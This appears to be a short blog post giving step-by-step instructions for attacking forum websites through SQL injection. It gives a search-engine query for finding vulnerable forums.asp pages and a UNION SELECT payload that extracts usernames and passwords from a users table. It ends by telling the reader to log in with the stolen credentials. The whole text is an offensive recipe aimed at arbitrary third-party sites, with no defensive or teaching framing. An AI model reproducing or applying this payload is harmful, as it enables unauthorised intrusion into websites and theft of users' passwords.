The Steps :
- Open www.Google.com and search for this - inurl:/forums.asp?iFor=
- Example's target - http://www.target.com/forum/forums.asp?iFor=
- Delete = symbol just like this - http://www.target.com/forum/forums.asp?iFor
- * If it is not working, find another target.
- Insert the Injection SQL after the = symbol that you have delete it - 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users
- Example- http://www.target.com/forum/forums.asp?iFor=12+union+select+1%2C2%2C3%2Cu_password%2C5%2Cu_id%2C7%2C8%2C9%2C10%2C1 1,12+from+users
- Word that come out below 10 TOPICS is the Username and the word come out below the DATED is the Password.
- You now can login at above of table 10 TOPICS / DATED.

Post a Comment